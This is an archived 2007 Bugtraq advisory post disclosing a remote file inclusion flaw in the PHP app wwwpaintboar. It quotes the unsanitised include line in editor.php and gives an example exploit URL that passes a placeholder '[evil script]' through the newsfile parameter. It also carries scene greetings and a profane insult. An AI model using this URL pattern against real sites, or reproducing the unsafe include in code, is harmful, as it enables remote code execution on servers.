Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

wwwpaintboar(newsfile) Remote File Inclusion Vulnerability

From: saw_xyz () yahoo com
Date: 9 Mar 2007 10:43:48 -0000
wwwpaintboar(newsfile) Remote File Inclusion Vulnerability
-----------------------------------------------------------
Version : 1.0
Website URL: http://phpforge.oirac.com/
-----------------------------------------------------------
Discoved by saw_xyz (sasan)
[XIII Security Researcher]
Gr33tZ t0 :Snake
My Home : www.saw13.com
fuck ahsyane st an davood [ashy member]
-----------------------------------------------------------
Vulnerable codeZ is in editor.php
in line 261 :
<? include "$newsfile"; ?>
-----------------------------------------------------------
Ex:
http://127.0.0.1/%5bpatch%5d/editor.php?newsfile=%5bevil script]
Previous By Date Next
Previous By Thread Next

Current thread: